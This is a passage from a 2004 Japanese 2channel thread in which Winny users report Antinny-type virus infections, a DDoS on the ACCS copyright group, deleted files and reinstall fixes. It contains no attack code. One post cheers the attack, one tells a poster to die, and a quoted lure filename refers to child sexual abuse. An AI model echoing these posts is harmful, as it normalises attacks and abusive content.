時限式田代砲なのか?面白いウィルスだな。

919 :[名無し]さん(bin+cue).rar:04/03/01 03:17 ID:pgB6lqnw
>>916
なんで?accs.or.jpが攻撃されなきゃならんのだろう・・・

920 :[名無し]さん(bin+cue).rar:04/03/01 03:38 ID:tCeUr7BX
>>916
WORM_MYDOOM.Aの亜種かな

921 :[名無し]さん(bin+cue).rar:04/03/01 03:41 ID:Eau/wETu
SCOやマイクソにアタックするウイルスあったね

922 :[名無し]さん(bin+cue).rar:04/03/01 05:15 ID:/xU2qbDH
http://www.accs.or.jp
プロバイダーのサイトだぞ?
そのウイルス作った奴営業妨害で訴えられそうだな

923 :[名無し]さん(bin+cue).rar:04/03/01 05:23 ID:4AGKgU6O
>>922
お前、目覚めてるか?

社団法人コンピュータソフトウェア著作権協会
http://accsjp.or.jp/

924 :[名無し]さん(bin+cue).rar:04/03/01 05:24 ID:4AGKgU6O
_| ̄|○

俺が覚めてなかった

925 :[名無し]さん(bin+cue).rar:04/03/01 05:26 ID:e3VrI2V9
>>922
これと勘違い?
珍しいドメイン弾いたら晒すスレ 4
http://tmp2.2ch.net/test/read.cgi/download/1076037572/6
ACCSNET.NE.JP (((( ;゚Д゚)))ガクガクブルブル → 茨城のCATV

926 :[名無し]さん(bin+cue).rar:04/03/01 05:29 ID:e3VrI2V9
あー。。neとorのチガイか
漏れもメガ覚めてなかった_| ̄|○

927 :[名無し]さん(bin+cue).rar:04/03/01 10:09 ID:pgB6lqnw
よくドメインを見よう!
accs.or.jp と accsjp.or.jp じゃ、決定的に違うYO!

928 :[名無し]さん(bin+cue).rar:04/03/01 11:26 ID:PlLwcBcG
普通の方も悪い方もどちらも落ちてるような

929 :[名無し]さん(bin+cue).rar:04/03/01 12:27 ID:OtnukaQx
市販のアンチウィルスソフトって常に新種のウィルスに一手遅れるのってダメじゃないのか?
誰かが犠牲になってからじゃないといけないなんて、鬼やん?

930 :[名無し]さん(bin+cue).rar:04/03/01 12:44 ID:wNdIG/jR
>>929
あんた、どうやったら先んじられると?

931 :[名無し]さん(bin+cue).rar:04/03/01 12:58 ID:OtnukaQx
会社の人が率先して人柱に

932 :[名無し]さん(bin+cue).rar:04/03/01 13:22 ID:TUuW2k0k
ny起動するたびaltavista_traversalがplalaを攻撃するようになりました。
どうすればいいでしょうか

933 :[名無し]さん(bin+cue).rar:04/03/01 13:27 ID:e3VrI2V9
死ねばいいと思うよ

934 :[名無し]さん(bin+cue).rar:04/03/01 13:32 ID:TUuW2k0k
おまえが市ね

935 :[名無し]さん(bin+cue).rar:04/03/01 13:37 ID:ckZgLcSH
俺も死のっと

936 :[名無し]さん(bin+cue).rar:04/03/01 13:38 ID:VbpEXHx6
>>916
ウチもなったぞ!

ウチはSystemとMSVCP.exeがCPU食い潰して
accsjp.or.jpに接続しようとしてたよ
あうぽが感知したんだが、今MSVCP.exeは遮断してある

とりあえずシステムの復元で戻した
で、今MSVCPを起動させてみると
accsjp.or.jpにアクセスをしようとするんだよ
BLOCKログがすごい数になるんだが
これってマジウィルスか??

937 :[名無し]さん(bin+cue).rar:04/03/01 14:07 ID:Oq2ZBco4
>>902
どうやら同じ奴みたいなんだが。
nyの「フォルダ情報」見るとフォルダ名がBBS
フルパスがダウンフォルダで、起動時にハッシュチェックしだすんだけど。

1.2Mのtxt.exe開いてからだわ。

938 :[名無し]さん(bin+cue).rar:04/03/01 14:16 ID:qrUxYGSf
ウィルスに感染してしまったという名目でACCS攻撃できるなんて願ったり叶ったり

939 :937:04/03/01 14:23 ID:0zFRtju6
ウイルススキャンでは反応しなかったよ

940 :[名無し]さん(bin+cue).rar:04/03/01 14:44 ID:VzucLUMf
CPU温度観察するのにNAVでシステムスキャンやったんだけど
ファイル名 (洋)金髪幼女調教 画像集 加藤あい.zip.jpg.exe
脅威名 W32HLLW.Antinnv
ってのが引っ掛かったよw

941 :[名無し]さん(bin+cue).rar:04/03/01 15:15 ID:thp0ixok
やっぱ、OSクリーンインストールが一番かも。

942 :[名無し]さん(bin+cue).rar:04/03/01 17:57 ID:ooF7KqAj
考えても見ろ。ウイルス職人も死万鉄苦やト連怒のソフトは持っているよ。
なんども試して感知されないものを作っているんだよ。
感知されないのは当たり前と考えろ。感知されるのに1,2週間はかかる。
最初の被害者になりたくなければ危ないものには手を出すな。
通常のレベルの脳味噌があればオフラインの退役PCなどで試すぐらいの
慎重さはもっているものだ。

943 :[名無し]さん(bin+cue).rar:04/03/01 18:04 ID:PlLwcBcG
>>942
そんな苦労してなくも普通に作れば感知されないよん。

944 :[名無し]さん(bin+cue).rar:04/03/01 18:10 ID:ooF7KqAj
なんだ感染した話はデマだったのかw

945 :[名無し]さん(bin+cue).rar:04/03/01 18:27 ID:qgRj7B0w
ウィルス感染→OSクリンインスコ
が最良の手段。
HDDイカれたなら諦めて買いにいくしか…

946 :[名無し]さん(bin+cue).rar:04/03/01 19:22 ID:w/BbC+wN
既出だったらスマソ
Winnyで違法ファイル集めてます(^^)vに勝手に変わってたのでシステムの復元をしようとしたら
1つ以上のドライブを有効または無効にしようとしたしたときエラーが発生しました。コンピュータを再起動して再試行して
ください。とでました、だけど再起動してもできません。どうすればいいでしょう?

947 :[名無し]さん(bin+cue).rar:04/03/01 19:23 ID:Q9SFeUGY
(^^)v

948 :[名無し]さん(bin+cue).rar:04/03/01 19:26 ID:dfAErV3T
>>946
再起動してもできません

なにができないの?システムの復元??

949 :[名無し]さん(bin+cue).rar:04/03/01 19:36 ID:dfAErV3T
解決したようだな

950 :[名無し]さん(bin+cue).rar:04/03/01 19:50 ID:ooF7KqAj
どうも異常に感染者が多いと思ったけどネタか。
あやふやなえぇをクリックした香具師は自分で始末しな。

951 :[名無し]さん(bin+cue).rar:04/03/01 19:51 ID:2dVh2/H7
便乗で申し訳ないが、俺も>>946と同じように、
システムの復元を有効にすることが出来ない・・・。

「すべてのドライブでシステムの復元を無効にする」のチェックが外せない。
外して適用しても、
「1つ以上のドライブを有効または無効にしようとしたしたときエラーが発生しました。コンピュータを再起動して再試行して
ください。」
のエラーが出る。

952 :[名無し]さん(bin+cue).rar:04/03/01 19:57 ID:Q9SFeUGY
System Restore Serviceが無効になってるんじゃないの

953 :[名無し]さん(bin+cue).rar:04/03/01 20:06 ID:smxcOXBb
次スレ立てるよ。

954 :[名無し]さん(bin+cue).rar:04/03/01 20:13 ID:qGHvdCr1
>>951
俺も復元できなくなってる。このanntiny2?はかなり手強いぞ。
おれも窓の手でレジストリエディタ使えるようにして、アヤシイの削除
して、ファイル変更(始めは2個づつ使えなくする。)を防いだはず
だったんだけど・・・。それで安心してたら、一気に20〜30ファイル
やられた・・・。

955 :[名無し]さん(bin+cue).rar:04/03/01 20:30 ID:kyh7QXIX
ついこの間発見されたAntiny.Eだと思われ


956 :P2Pしない輩:04/03/01 20:31 ID:rJ5CujiD
誤爆だったらスマン
http://securityresponse.symantec.com/avcenter/venc/data/w32.netsky.d@mm.html

ネットスカイは日本では未だ未対応?

957 :[名無し]さん(bin+cue).rar:04/03/01 20:35 ID:qGHvdCr1
>>955
でそのAntiny.Eは対応まだなんですね?

958 :[名無し]さん(bin+cue).rar:04/03/01 20:54 ID:pqQnfT6P
あー、やられちまった。

しゃーないから再インストして、いらんファイル大量に処分するよ。
ハードディスクぐちゃぐちゃになってたから、ちょうどいい機会だったかも。

959 :[名無し]さん(bin+cue).rar:04/03/01 21:30 ID:f+0SIJRb
>>957
ノートンでは対応済みです(日本語で詳細が書かれてあるページがあったんですが、何故か無くなっています)。
http://www.symantec.co.jp/region/jp/sarcj/cgi-bin/virauto.cgi?vid=37341

同ワームには「システムの復元」を不可能にする機能はありませんでした。

960 :[名無し]さん(bin+cue).rar:04/03/01 23:59 ID:01nBrSeB
>>959
性質:ワイルド

ほほう。

961 :[名無し]さん(bin+cue).rar:04/03/02 00:17 ID:ukAgh8Wd
OS再インストールしたのに
DOS窓が開くウィルス?が治りません。
対処方法はありますか?

962 :[名無し]さん(bin+cue).rar:04/03/02 00:18 ID:N7osE7xL
ワラタ

963 :[名無し]さん(bin+cue).rar:04/03/02 00:22 ID:Ic6d5q1F
うお。なんだよこれ。ワイルドってなんだああああああああああ

964 :[名無し]さん(bin+cue).rar:04/03/02 01:06 ID:kGaI/5S2
今のところ、最強ウィルスは >>839 か?
ウィルスソフト常駐しても意味ないし

965 :[名無し]さん(bin+cue).rar:04/03/02 02:02 ID:p9c+p2Nx
感染報告

アイコンがメモ帳な「付録.txt .exe」っつーファイルをクリックしちまいました。
当初異変はなかったものの>>911にあるように3月1日になった瞬間CPU使用率が100%に。

ノートンがわけのわからんファイル(>>911のやつに名前が似てる)が
どこそこにアクセスしますとか言い出す。

そこで怖くなってOS再インスコしたからACCSだったかどうかはわからんのだが。
再インスコ後は特に問題なし。

ネタだと思うなら玉置成実Greeting(パスなし)とかゆーの落としてみぃ。

966 :[名無し]さん(bin+cue).rar:04/03/02 02:05 ID:Yj8JheP2
>>965
ハッシュPLZ

967 :[名無し]さん(bin+cue).rar:04/03/02 02:08 ID:p9c+p2Nx
>>966
キャッシュも全部消しちまったんで・・・。
今検索かけたののの中からファイル名がそれっぽいのは
20250c03ff353ef3a09a4234c5dc1585
3745598ac641b10343b8bfe323be6075
あたり。

968 :[名無し]さん(bin+cue).rar:04/03/02 02:10 ID:p9c+p2Nx
あ、ちなみに>>732が同じことやったみたい。
>>732は今どうしているのか。

969 :[名無し]さん(bin+cue).rar:04/03/02 02:15 ID:Yj8JheP2
3月1日まではひたすら潜伏しているだけで何もしないの?
UPフォルダ追加したりとか

970 :[名無し]さん(bin+cue).rar:04/03/02 02:23 ID:p9c+p2Nx
わからん。しばらくny起動してなかったし。
少なくとも普通にwindows使ってる分には問題はなかったけど。

971 :[名無し]さん(bin+cue).rar:04/03/02 02:28 ID:powBc+rf
ずっとCPU使用率が100%の状態なの?

972 :[名無し]さん(bin+cue).rar:04/03/02 02:31 ID:p9c+p2Nx
うん。そう。常に100%。
再起動直後でも100%。

973 :[名無し]さん(bin+cue).rar:04/03/02 02:33 ID:W/1YSVIT
accs攻撃してるんだよ

974 :[名無し]さん(bin+cue).rar:04/03/02 02:47 ID:Df8cgQwO
使い手の心理を酌んでくれるいいワームだぜ…

975 :[名無し]さん(bin+cue).rar:04/03/02 02:49 ID:9Sffp0cL
(^^)v

976 :[名無し]さん(bin+cue).rar:04/03/02 02:58 ID:f75L5hFr
キャッシュから変換中、あるいは変換後に
Cドライブが初期化されるのですが、
対処法は既出ですか?

977 :[名無し]さん(bin+cue).rar:04/03/02 02:59 ID:9Sffp0cL
>>976
(^^)v


978 :[名無し]さん(bin+cue).rar:04/03/02 03:11 ID:dJ401xec
http://www.takamin.com/oekakichat/user/oekakichat3.php?userid=62499
お絵かきチャット。嵐募集中

979 :[名無し]さん(bin+cue).rar:04/03/02 09:06 ID:HJ40X7KD
あるイメージファイルをマウントしたら
CドライブとDドライブの指定階層(2.3階層まで見たいです)
までのファイルと、階層無関係に主に便利用途で使うフォルダのファイル
(IEお気に入りやスタートメニューのショートカット)関連が
削除されてしまった模様です。一年ほど使ってますが
実際に削除されたのは初めてなので驚いてます。

きれいに復活させる方法など無いですよね


980 :[名無し]さん(bin+cue).rar:04/03/02 09:38 ID:dQwQNX3N
実行した物,教えて

981 :[名無し]さん(bin+cue).rar:04/03/02 09:57 ID:KBsf4YZk
>>979
原因はこれかな?
http://mxtrojan.at.infoseek.co.jp/column02.html

これが原因だとしたら復活は諦めたほうがいいよ

982 :[名無し]さん(bin+cue).rar:04/03/02 10:31 ID:DeZm8Mrd
( ̄ー ̄;)

983 :[名無し]さん(bin+cue).rar:04/03/02 10:34 ID:3tNyUFkG
MSブラスタってまだ活動してるのかな。
あれって、Windowsの再構築の際ネットにつながってると
感染してしまうよね。で、先に対策パッチを当てようにも
SP4とかを適用しないとだめだったりして、結構面倒なんだよね。

で、一番いいのはいい状態のシステムドライブをイメージで残して
それを復活させることかな。

984 :[名無し]さん(bin+cue).rar:04/03/02 10:41 ID:HJ40X7KD
>>981
おっしゃるとおりでした。(レジストリは該当キー無かったけどExeが検索された)
OSはDOS画面の表記がちょっと日本語から英語に変わったの以外は
起動は特に問題なし、あとプログラムファイルもショートカットだけ
消されて実際は実行できます。ただしCドラのみでDドラは完全に
フォルダ以外は消えてました。
Dドラはもともと保存用なので被害はありましたが、
ゴミ箱削除したファイルを復活させるソフトである程度復活できました。
いままでNyのセキュリティにちょっと無関心すぎたので反省してます。

そういえばガリガリやってたんでちょっと気にはなってたけど、単に
いままで良くあったるメモリを必要以上に食ったりCPUやHDD負荷を
かけるタイプでそれ以外は無害なタイプの物だとおもってました。

985 :[名無し]さん(bin+cue).rar:04/03/02 10:52 ID:KBsf4YZk
>>984
システムの復元も試してみた?

986 :984:04/03/02 11:04 ID:HJ40X7KD
ああ、つかよく考えたら単にD削除終わってC削除処理中にガリガリウザイから
運良く電源切ったからシステムの重要ファイルやプログラムファイルにまで影響が
及んでないってだけのことなのか・・・・・?

でも普通再起動したら又実行される種類なんだよね。
レジストリに自動実行のRunのキーらしいものが無かったせいかのかな?

>>985
とりあえずシステムは正常なので何も試してないです。

987 :[名無し]さん(bin+cue).rar:04/03/02 11:58 ID:R8KQWPTw
>>983
まだ残ってはいるんじゃないの?
それで別に対策パッチ当てなくても
ルーターやFWソフトを再構築直後に入れれば問題ないじゃん・・・。

>>984
また発動されたら困るから今のうちに再インストールした方が
万が一のショックがなくていいと思う罠

988 :[名無し]さん(bin+cue).rar:04/03/02 12:16 ID:XjWmuPRn
>>965
>アイコンがメモ帳な「付録.txt .exe」っつーファイルをクリックしちまいました。
おいらもやっちまったぁ・・

>【アルバム】 2004.02.18 CHEMISTRY 「One × One」.zip
で、その中の
>限定版.folder
というフォルダを開こうとしたら、勝手に 付録.txt.exe 実行しちゃいました。
setupapi.log には

#-198 コマンドラインは処理されました。: C:\WINDOWS\Explorer.EXE
#-024 ファイル "D:\Winny2\temp\【アルバム】 2004.02.18 CHEMISTRY
「One × One」\[アルバム] (2004.02.18) CHEMISTRY - One × One\付録.txt.exe" を
"C:\WINDOWS\Downloaded Program Files\付録.txt.exe" へコピーしています。
#E361 署名がない、または正しく署名されていないファイル "D:\
Winny2\temp\【アルバム】 2004.02.18 CHEMISTRY 「One × One」
\[アルバム] (2004.02.18) CHEMISTRY - One × One\付録.txt.exe" をインストールします (Policy=Ignore)。
エラー 0x800b0100: サブジェクトに署名がありませんでした。

ってことが残ってます。大丈夫なんだろうか?


989 :[名無し]さん(bin+cue).rar:04/03/02 12:22 ID:1bCkLRob
      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )

990 :[名無し]さん(bin+cue).rar:04/03/02 12:41 ID:jCsKtKzl
>>988
大丈夫じゃないよ

991 :[名無し]さん(bin+cue).rar:04/03/02 13:07 ID:BE+eeNYf
      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ <    その戦に参戦!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )


992 :[名無し]さん(bin+cue).rar:04/03/02 13:14 ID:3tNyUFkG
>988
OSのクリーンインストールをお奨めする。

993 :[名無し]さん(bin+cue).rar:04/03/02 13:30 ID:6P49u5LC
1000!

994 :[名無し]さん(bin+cue).rar:04/03/02 13:31 ID:GtUieuNy
1000

995 :[名無し]さん(bin+cue).rar:04/03/02 13:39 ID:5vGwgmK+
微妙に995

996 :[名無し]さん(bin+cue).rar:04/03/02 13:41 ID:bnBGB3Mw


997 :[名無し]さん(bin+cue).rar:04/03/02 13:42 ID:9j2roy+O
uiuiui


998 :[名無し]さん(bin+cue).rar:04/03/02 13:42 ID:9j2roy+O
男の子大好き


999 :[名無し]さん(bin+cue).rar:04/03/02 13:44 ID:5vGwgmK+
山よりも低く谷よりも高い999get

1000 : :04/03/02 13:44 ID:VroW8oY6
( ´,_ゝ`)プッッッッッッッッッッッッッッッッッッッッ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

250 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)